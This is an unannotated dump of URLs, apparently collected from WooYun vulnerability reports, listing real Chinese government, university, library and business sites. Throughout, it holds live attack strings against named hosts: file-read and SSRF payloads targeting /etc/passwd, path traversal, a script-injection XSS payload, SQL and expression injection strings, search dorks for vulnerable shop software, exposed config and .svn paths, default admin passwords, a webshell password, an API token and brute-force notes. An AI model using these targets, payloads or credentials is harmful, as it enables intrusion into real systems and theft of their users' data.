URL:http://calendar.hexun.com/client/FData/Default.aspx?keydata=1&page=1 POST:http://calendar.hexun.com/client/FData/ http://my.tv.sohu.com/user/profile/basic_update.do http://www.infosea.com.cn/yonghu.html http://61.187.55.41:8090/opac/dzxxxs.jsp?dztm=00007&index=3 http://58.30.20.36:8089/opac/dzxxxs.jsp?dztm=00007&index=3 http://125.223.252.12:8089/opac/dzxxxs.jsp?dztm=00007&index=3 http://59.51.114.198:8088/opac/dzxxxs.jsp?dztm=00007&index=3 http://60.171.185.69:8089/opac/dzxxxs.jsp?dztm=00007&index=3 
http://58.132.57.4:8070/opac/dzxxxs.jsp?dztm=00007&index=3 http://124.207.106.138:8070/opac/dzxxxs.jsp?dztm=00007&index=3 http://111.207.101.74:8070/opac/dzxxxs.jsp?dztm=00007&index=3 http://www.sxsmyxx.cn/tsims/NewsList.asp?T_Name=xxxx&lx=99 http://192.168.3.32:809/img_cell/ http://192.168.3.32:809/img/ http://202.204.172.166 https://portal.haier.com/ http://www.suse.edu.cn/ http://221.2.39.157:81/ http://cvs.hexun.com/zhaopin/ http://www.tlghj.gov.cn/Data/view.aspx?id=649 http://sqlmap.org http://wooyun.org/bugs/wooyun-2010-085980 http://210.28.144.20:206/opac/ http://opac.yzu.edu.cn:8080/opac/ http://opac.lib.sdu.edu.cn/opac/ http://lib2.nuist.edu.cn/opac/ http://lib.shisu.edu.cn:8080/opac/ http://202.205.213.113:8080/opac/ http://211.87.113.2:8080/opac/ http://manage.gc.17173.com/cloud/home/Frame.wa游戏学院后台管理系统 http://wooyun.org/bugs/wooyun-2010-062518 http://www.gxhzedu.net/fsmcms http://www.hzfgw.gov.cn/fsmcms/ http://www.gxhzjw.gov.cn/fsmcms/ http://www.cnfia.cn/fsmcms/ http://www.btgaj.gov.cn/fsmcms/ http://i.sohu.com/profile/home/swfUploadIcon.htm(修改资料上传头像) http://sucimg.itc.cn/avatarimg/s_247083258_1432619329154_c175 http://www.shaoyang.gov.cn/help.aspx https://inquiry.gham.cn:443/funds-struts/fund-net-chart-table/?&redirect:xxx${13579246-1 http://www.whcits.com/xieyou.aspx http://117.40.193.113:8080/ www.hrbd***** http://www.17y.com http://www.17y.com/sds/fame http://api.360iii.net:8888/iengine360API/stock/stockAction.action www.360iii.com,record.360iii.com,m.360iii.com等 http://registration.360iii.net:8080/phoneService/news/news_getNews.action http://61.144.227.35/main/gb/adminhall/result1.jsp http://cwc.hnust.cn/cwcxv4/sf40/Axhfind.asp http://portal.hnust.edu.cn http://stu.hnust.edu.cn/xg/application/main.jsp http://wenku.baidu.com/view/714197dc804d2b160b4ec0e9.html http://line.yizijia.cn/yuding/success?order=256613 http://www.hh168.gov.cn:8080/vip1/userlogin.action https://123.125.17.30/ http://v.boqii.com/ http://v.boqii.com/ 
http://v.boqii.com//vetapi.php?UDID=123&url=file:///etc/passwd http://v.boqii.com//vetapi.php?UDID=123&url=http://www.baidu.com/index.php http://v.boqii.com//vetapi.php?UDID=123&url=http://我的服务器ip/1.txt http://v.boqii.com/.htaccess http://m.boqii.com/.htaccess http://218.60.146.58/News/3.asp http://www.10jqka.com.cn:80/ www.10jqka.com.cn http://123.125.123.24/views/login.html http://123.125.123.130/views/login.html http://zchq.cuc.edu.cn/Account/Login http://www.zzfdc.gov.cn:80/news/listAction.do?act=wyglLeft&pageType=wygl&boardName=%E5%8A%9E%E4%BA%8B%E6%8C%87%E5%8D%97&boardId=-999 http://m.12308.com/m.zip http://www.sf-bbs.com/ http://www.sf-bbs.com/config/.config_ucenter.php.swp http://www.chdc.com.cn/ http://www.chdz.com.cn/) http://123.233.247.75/wjj_site/ldaplogin/login_login.action存在命令执行漏洞 http://123.233.247.75/wjj_site/2.jsp密码tom http://bsp-test.sf-express.com:8088/ http://estore.wacom.com.cn/这个是wacom的分站,存在XSS的地方在订单的收货地址那里,插入: http://t.cn/R2yDCcv http://cx.njnu.edu.cn/sjjx/shownews.aspx?newsno=210 http://cx.njnu.edu.cn/sjjx/MoreNews.aspx?NewsType=FB0FDFF07B50C0AB http://rsc.njnu.edu.cn/XmlService/search.aspx?gntype=120&parvalue=LeafType=0&pagesize=10000&page=-1 http://jcfw.njnu.edu.cn/links.asp?typeID=26 http://jcfw.njnu.edu.cn/sources_list_1.asp?kcmc= http://jcfw.njnu.edu.cn/news_view.asp?newsID=1211 http://jcfw.njnu.edu.cn/books_list_1.asp?smmc= http://jcfw.njnu.edu.cn/sources_list_2.asp?dwmc= http://jcfw.njnu.edu.cn/teachers_list_1.asp?jsmc= http://jcfw.njnu.edu.cn/aspects_list_1.asp?zymc= http://gfs.njnu.edu.cn/default.php?mod=article&fid=4 http://gfs.njnu.edu.cn/default.php?mod=article&settype=0&fid=1 http://rsc.njnu.edu.cn/xmlService/search.aspx?page=&pagesize=&gntype=205&parvalue= http://lab.njnu.edu.cn/xinli/MoreNews.aspx?NewsType=-3 http://lab.njnu.edu.cn/xinli/ShowNews.aspx?NewsType=-1&NewsNo=885 http://lab.njnu.edu.cn/xinli/Common.aspx?TypeSuoShu=ShiYanJiaoXue&NewsType=104 http://lab.njnu.edu.cn/xinli/ShowNews.aspx?NewsNo=573&NewsType=-901 
http://kc.njnu.edu.cn/xlzx/Document.aspx?CategoryID=1&id=1 http://kc.njnu.edu.cn/xlzx/Document.aspx?CategoryID=5&DocumentID=172&ID=172 https://61.177.62.254 http://www.fywealth.cn/ http://www.infosea.com.cn/yonghu.html http://61.187.55.41:8090/opac/qkdh_zm.jsp?flh=L http://58.30.20.36:8089/opac/qkdh_zm.jsp?flh=B http://211.86.195.15:8086/opac/qkdh_zm.jsp?flh=B http://125.223.252.12:8089/opac/qkdh_zm.jsp?flh=P http://59.51.114.198:8088/opac/qkdh_zm.jsp?flh=P http://210.46.140.21:8080/opac/qkdh_zm.jsp?flh=P http://60.171.185.69:8089/opac/qkdh_zm.jsp?flh=S http://218.75.208.250:8089/opac/qkdh_zm.jsp?flh=M http://202.192.67.29/QuestionList.aspx http://125.218.212.175:10001/QuestionList.aspx http://210.38.57.36:8086/hudong/QuestionList.aspx http://kjxyl.gdufs.edu.cn/hudong/QuestionList.aspx http://219.222.244.59:6006/QuestionList.aspx http://202.192.67.29/TopicList.aspx http://125.218.212.175:10001/TopicList.aspx http://210.38.57.36:8086/hudong/TopicList.aspx http://kjxyl.gdufs.edu.cn/hudong/TopicList.aspx http://219.222.244.59:6006/TopicList.aspx www.dwb.so http://kf.07073.com/company/manage厂商自助后台登陆处无验证码,可爆破。 http://m.120ask.com/kuaiwen/tongbingxianglian/chatroom?gid=10055&sex=2 http://user.iyiyun.com/ www.ta-police.com/so.aspxkey=1,在搜索后构造[%& www.letvcloud.com www.letvcloud.com ftp://admin:admin@www.cni22.com.cn http://hs.whrt.gov.cn/safemanager/login.do http://hs.whrt.gov.cn/safemanager/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector http://api.mingdao.com/post/v2/img.aspx?access_token=2a691ac8247447baa90223b9374168b4&pagesize=10&post_type=0&filter_type=0&format=json http://scxy.nmjt.gov.cn/jssc/Public.aspx?page=DataQuery/QueryConstructInfo.aspx?type= http://m555.cn/i.asp?id=F8BA43EE-41BB-4694-8E58-9AB50C1104F7 http://180.166.6.78/ https://180.166.6.78/ https://180.166.6.81/ http://www.100eshu.com/Member/MyAccount/myOrder.aspx http://w8.wjxit.com/view.asp?cid=550&id=749 http://w8.wjxit.com/manage/ username:admin 
password:admin001 www.fishzj.com www.gdzfy.com www.intjk.com www.xsfcw.com www.gd-caxin-gwzy.com www.gd-caxin-zxrj.com www.zwgnh.com www.seone.net http://www.yqjqnxs.com:8888/accountclient/manager/checkstream.action http://pushmail.wo.com.cn/mail/login.action?user= font-weight:normal font-weight:normal http://wooyun.org/bugs/wooyun-2010-082959 http://122.144.134.79/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.ccas.com.cn:8008/general/score/flow/scoredate/result.php?FLOW_ID=11 http://219.139.134.9:70/general/score/flow/scoredate/result.php?FLOW_ID=11 http://www.esyf.net:8000/general/score/flow/scoredate/result.php?FLOW_ID=11 http://61.153.216.116:85/general/score/flow/scoredate/result.php?FLOW_ID=11 http://idula.com/general/score/flow/scoredate/result.php?FLOW_ID=11 http://train.guosen.com.cn:8080/customize/nwc_755_newvlive/login/login.html http://124.127.187.6/qcar/ http://124.127.187.6/qcar/checkUser.do http://124.127.187.6/qcar/checkUser.do http://wooyun.org/bugs/wooyun-2010-019206 http://demo.kuaidiantong.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2 http://dj.gzdisc.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.xxsp.me/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://www.eme.com.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://xn--ehqsq872berelo3bbjl.xn--fiqs8s/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 http://mp.sohu.com/web/personal/get http://sucimg.itc.cn/avatarimg/b9242b2cbe19450a9347accbc8dcc639_1432645407636 http://pinge.focus.cn/a/edituserinfo http://121.33.74.72/ http://dms.39.net/login.aspx http://www.hishop.com.cn/ inurl:SubCategory.aspx?keywords+minSalePrice http://127.0.0.1/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2%27&brand=27 
http://spt.0351tao.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.emmelle.cn/shop//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.nnjt365.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.oxie.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yuntoys.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.qhjddl.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.gzkorea.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://feihongzhixin.mall.hjhl.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://310kx.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.1688hub.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.xdhome.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://sostore.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27&PageSize=24 http://cnzdrc.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://qmhy.com.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://twcz.net//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://cqjnm.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://eyigo.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yuanxingchina.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 
http://shop98.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.51ganxian.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://teli-go.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.wymao.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yz35.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.sbada.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.ztfmall.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.runqu.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.oftshop.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.komaes.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.wbuyers.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://demo.shopefx.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.qm3s.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.gonggongjiaoyu.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.100com.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://fulifei.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://baiai.me//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.nydao.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 
http://www.qinta.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.bibimian.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://12skycolors.com.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.ccegw.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://yuanzhongfu.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.drake.net.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.htd2013.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.51860007.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.imeirongyuan.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://cq.diy023.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://youhuiyoudao.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.sanbugou.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://4007070666.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://longfengjiewang.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://eyecolor.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://xiaohema.cn/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://168book.net/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://guoranhaoshi.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 
http://yunhaipifa.com/SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://auto-apex.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://mlgc90.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://suzonger.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://kawa999.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.quanquanle.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://seagou.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://www.nilaya.cn//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://xt1986.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://cheku88.com//SubCategory.aspx?keywords=2&minSalePrice=&maxSalePrice=&categoryId=1&TagIds=2&brand=27 http://223.202.67.50:8080 www.office-home.com.cn上下载365激活助手并打开 http://www.office-home.com.cn/webservice/api.asmx http://www.infosea.com.cn/yonghu.html http://61.187.55.41:8090/opac/ckmarc.jsp?kzh=zyk0347383 http://tsjs.sdwm.cn:8000/opac/ckmarc.jsp?kzh=zyk0043454 http://60.171.185.69:8089/opac/ckmarc.jsp?kzh=zyk0046921 http://www.kflib.cn:8090/opac/ckmarc.jsp?kzh=zyk0000925 http://125.223.252.12:8089/opac/ckmarc.jsp?kzh=zyk0020576 http://218.75.178.63:8089/opac/ckmarc.jsp?kzh=zyk0035408 http://210.45.183.219/opac/ckmarc.jsp?kzh=zyk0126857 http://211.86.195.15:8086/opac/ckmarc.jsp?kzh=zyk0036020 http://59.51.114.198:8088/opac/ckmarc.jsp?kzh=zyk0026652 http://211.84.229.10:8089/opac/ckmarc.jsp?kzh=zyk9001223 http://**.**.**/manage/Login.asp_ http://admin.fotomore.com/login.php http://www.sz-cits.cn/ http://117.79.131.99:8080/.svn/entries http://m.sfbest.com/user/address/list/1 http://m.sfbest.com 
http://m.sfbest.com/user/address/list/1 http://wooyun.org/bugs/wooyun-2010-061369 http://www.fqxzfw.com.cn/ http://bs.wzzl.gov.cn:8888/ http://zwfw.bincheng.gov.cn/ http://xzfw.wjq.gov.cn/zwdt/ http://xz.yuanan.gov.cn/web/ http://www.goldlib.com.cn/list.asp?classid=22 data:tag=news&callno=&tag=news&subtag=subexpired&sub=%E6%A3%80%E7%B4%A2 http://210.26.83.207:8001/opac/ http://111.123.226.31:90/opac/ http://211.84.163.240:8080/opac/ http://114.242.187.29:8080/opac/ http://113.247.235.133:8081/opac/ http://library.cnuschool.org.cn:8080/opac/ http://xsxwkp.cjlu.edu.cn/ http://www.ilas.com.cn/ http://211.69.140.40/NTBookRetrAuth.aspx?Pin=J http://ilas.ynlib.cn/NTBookRetrAuth.aspx?Pin=P http://202.96.165.98//NTBookRetrAuth.aspx?Pin=J http://lib.wdu.edu.cn:8081/NTBookRetrAuth.aspx?Pin=P http://110.65.147.72/NTBookRetrAuth.aspx?Pin=J http://www.mzshbj.gov.cn http://www.septwolves.com/readme.txt http://www.septwolves.com/phpinfo.php http://tlsw.net:8077/login/login.html https://mos.meituan.com/ http://www.apsjournal.com/Web/Login.aspx# http://www.lcjsyx.com/Web/Login.aspx# http://sypft.cnmanu.net/Web/Login.aspx# http://www.jsnyxb.com/Web/Login.aspx# http://dxjykxn.cnmanu.cn/Web/Login.aspx# http://www.tjkyhr.com/hrtool/Default.aspx?PID=6 http://beijing.ahyylw.com/hrtool/Default.aspx?PID=6 http://nyb.shibufangcao.com/hrtool/Default.aspx?PID=6 http://www.e855.net/hrtool/Default.aspx?PID=6 http://v8.workyi.com//hrtool/Default.aspx?PID=6 http://www.e-engine.com.cn:8080/admin_bg/,访问就可以直接看到管理后台的结构。 http://fsxy.hbue.edu.cn/TenYears/ http://iir.circ.gov.cn/exam_apply.jsp http://ydxuexi.cnsuning.com/clp/redirectLogin.htm http://m.fotomore.com/member/piclist.php?fid=1 http://124.126.119.144/ http://player.hz.letv.com http://210.32.205.60/Code.aspx?id=0199018805 http://opac.qzjmc.edu.cn:8085/Code.aspx?id=0199018805 http://210.35.35.5:82/Code.aspx?id=0199018805 http://my.lib.zust.edu.cn/Code.aspx?id=0199018805 http://211.69.20.130:81/Code.aspx?id=0199018805 
http://opac.hznu.edu.cn/Code.aspx?id=0199018805 www.paisi.edu.cn:85/Code.aspx?id=0199018805 http://124.160.90.204/Code.aspx?id=019901880 http://wooyun.org/bugs/wooyun-2010-091263 http://oa.shenmojiaoyu.com:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://oa.akcq.com/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://www.ahjinzhai.gov.cn:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://61.136.203.132:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://oa.orionww.com:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://58.221.210.116:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://oa.zjcof.com.cn/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://oa.shenmojiaoyu.com:7001/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 http://ahoa.cn/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1 www.bellavita.com.tw/eng/floor.php?f=6 http://www2.taipei-101.com.tw/NEWSV/news_in.aspx?News_Sn=71 http://122.96.62.194:6969/net/home_init.action http://122.96.62.194:6969/admin/adUser_login.action http://math.stu.edu.cn/staff/staff_detail.asp?id=15 http://wooyun.org/bugs/wooyun-2010-061369 http://www.fqxzfw.com.cn/ http://bs.wzzl.gov.cn:8888/ http://zwfw.bincheng.gov.cn/ http://xzfw.wjq.gov.cn/zwdt/ http://xz.yuanan.gov.cn/web/ http://www.wushang.com http://my.oppo.com/user/findme?callback=http%3A%2F%2Fmy.oppo.com%2Fuser http://www.tjkyhr.com/persondh/urgent.aspx?key= http://beijing.ahyylw.com/persondh/urgent.aspx?key= http://nyb.shibufangcao.com/persondh/urgent.aspx?key= http://www.e855.net/persondh/urgent.aspx?key= http://v8.workyi.com/persondh/urgent.aspx?key= http://www.tjkyhr.com/PersonDH/TuiJian.aspx?key= http://beijing.ahyylw.com/PersonDH/TuiJian.aspx?key= http://nyb.shibufangcao.com/PersonDH/TuiJian.aspx?key= http://www.e855.net/PersonDH/TuiJian.aspx?key= 
http://v8.workyi.com/PersonDH/TuiJian.aspx?key= http://58.52.202.124/NoticeDetail.aspx?type=notice&id=2385 http://www.xgxz.gov.cn/NoticeDetail.aspx?type=notice&id=2237 http://www.dwxzfu.cn/NoticeDetail.aspx?type=notice&id=2195 http://www.alzwfw.com/NoticeDetail.aspx?type=notice&id=2268 http://cbyj.hbncw.cn/Index/noticeDetail.aspx?type=1&id=5147 http://221.233.196.131/NoticeDetail.aspx?type=notice&id=2265 http://www.ymxz.gov.cn/NoticeDetail.aspx?type=notice&id=2167 http://square.elong.com/ http://222.223.229.50:8080/admin/login.aspx http://211.157.186.169:8011/admin/login.aspx http://221.214.164.198:1039//admin/login.aspx http://www.qwyxjx.com/admin/login.aspx http://www.zjkljjx.com/admin/login.aspx http://111.63.18.151:81/admin/login.aspx http://www.whshjx.com/admin/login.aspx http://110.249.129.242/admin/login.aspx http://www.xmjdjx.cn/admin/login.aspx http://www.zljx.net:8080/admin/login.aspx http://store.oppo.com/orders/150527142154531/show http://store.oppo.com http://www.jpreto.com/manager/global/sys_setting.aspx http://www.yuanyangex.com/manager/global/sys_setting.aspx http://mashuihong.sx1.80data.net/manager/global/sys_setting.aspx http://www.sijgo.com/manager/global/sys_setting.aspx http://www.lbiexp.com/manager/global/sys_setting.aspx http://test4.majexpress.com/manager/global/sys_setting.aspx http://www.ipost520.com/manager/global/sys_setting.aspx http://v.boqii.com/vetapi.php?UDID=123&url=file:///etc/passwd http://gz.ip66.com/admin.php http://www.100eshu.com/ScEbook_Admin/login.aspx http://www.astro.ncu.edu.tw/people/researcher_bio.php?id=1 http://www.astro.ncu.edu.tw/publication/all_publication_e.php?pubdate=1 http://www.astro.ncu.edu.tw/~PTF/index.php?page=../../../../../../../../../../../etc/passwd http://www.astro.ncu.edu.tw/publication/all_publication_e.php?pubdate=%3Cscript%3Ealert%28/1/%29%3C/script%3E http://**.**.**/was2/xmsga/jsp/module/user/user_login.jsp_ www.ga.xm.gov.cn:3388/was2/xmsga/ptluser.action cn:3388/was2/xm***** 
http://219.146.10.134/ http://www.tygh.gov.cn/tygh/tygh/list.action http://count.wowsai.com/webalizer/ http://jr.hc360.com(118.194.34.150) http://118.194.34.150 http://42.96.144.54/ https://61.155.182.85/index.php?r=user%2Findex http://www.iqiyi.com/u/api/user/update_user_info?nickname= http://210.51.195.44/uploadMonthly/20150527164501$c.asp http://211.71.233.63/21stlearn/ http://xxxx/21stlearn_sync/file_list2.jsp http://xxxx/21stlearn_sync/file_list2.jsp?dir=D:/LearningSoft/21stlearn/Webapps/upload/1/2015-05-26/65&sub_file=0 inurl:web/allnewsnr.asp?bianhao= http://www.gzysx.com/sx/web/web/web/allnewsnr.asp?bianhao=96 http://www.gzjwch.com/web/web/web/allnewsnr.asp?bianhao=649 http://182.151.215.126/web/web/web/allnewsnr.asp?bianhao=23 http://125.66.2.3/web/web/web/allnewsnr.asp?bianhao=435 http://125.67.64.236:6611/web/web/web/allnewsnr.asp?bianhao=1891 http://220.178.213.189/web/web/web/allnewsnr.asp?bianhao=89 http://www.nmgca.com.cn/login.action http://www.whcits.com/xianlu.aspx?id=07001536599&qu=%BB%AA%B6%AB http://www.xcsrd.gov.cn/login.jsp http://www.xcsgxj.gov.cn/login.jsp http://www.hhflcp.com/webadmin/ http://www.hhflcp.com/about.php?type=gywm http://www.hhflcp.com/about.php?type=gywm http://www.10010999.com/cms/login.jsp http://www.10010999.com/cms/login.jsp http://218.60.147.16/ http://www.fjforestry.gov.cn:38501/login.aspx http://www.fjforestry.gov.cn:38501/GovSystem/Stu_User_Manage.aspx?action=edit&infoid=4833(改相应的ID) http://about.3158.cn/jiaru/zhaopin/?id=XXX http://210.32.205.60/Periodical.aspx?ID=1200006245 http://124.160.90.204/Periodical.aspx?ID=1100003012 http://www.paisi.edu.cn:85/Periodical.aspx?ID=1100003012 http://211.69.20.130:81/Periodical.aspx?ID=1200006245 http://my.lib.zust.edu.cn/Periodical.aspx?ID=1200006245 http://115.231.0.41/Periodical.aspx?ID=1200006245 http://210.33.60.110/Periodical.aspx?ID=1200006245 http://www.zjkfda.gov.cn/detail5.asp?newsid=1371 http://111.113.17.195:7028/Kjbm/baoming/login.action 
http://www.ncszfcg.gov.cn:8002/login.aspx http://www.ncszfcg.gov.cn:8002/system/Stu_User_Manage.aspx?action=edit&InfoPager=1&infoid=1033 url:http://61.183.121.210:8380/invoker/JMXInvokerServlet http://202.115.133.173/StudentInfo/StuAcsBsInfoHandler.ashx?Action=ModifyPwd http://zxxs.gzsjyt.gov.cn/jsp/public/login.jsp http://222.240.176.21/ https://github.com/lionzixuanyuan/suning_json/blob/5574a36bb7543c390f21407e9c27254ff58e217b/lib/suning_json.rb http://plazamallsit.cnsuning.com:8080/api/get_member_info?phone=18626464667&token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/get_member_info_by_card?vip_card=510202000025&token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/bonus_adjustment http://plazamallsit.cnsuning.com:8080/api/get_member_redeem_row_count?vip_card=510202000025&token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/get_member_gift_redeem?vip_card=510202000025&gift_id=21&token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/get_all_gift?token=asdasdasdasd http://plazamallsit.cnsuning.com:8080/api/get_member_info_by_card?vip_card=510202000025&token=asdasdasdasd http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=file:///etc/passwd http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=file:///www/web/xiuxiu.web.meitu.com/plat/pic_proxy.php http://star.longzhu.com/520 http://star.longzhu.com/562319/Setting/Room http://zhanzhang.sm.cn/open/schema http://zhanzhang.sm.cn/open/XmlValidate http://www.njcky.com/news/detail.aspx?nid=59 http://www.njcky.com/njcky.rar http://www.njcky.com/Admin/Admin_Index.aspx http://119.90.53.178:9999/ redis_version:2.8.4 redis_git_sha1:00000000 redis_build_id:a44a05d76f06a5d9 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.8.2 process_id:28300 run_id:162ad9151062bf85375ffffe41fc2fc9d111c058 tcp_port:6379 uptime_in_seconds:7188735 lru_clock:667450 used_memory:15533496 used_memory_human:14.81M used_memory_rss:19869696 used_memory_peak:29648512 used_memory_peak_human:28.28M 
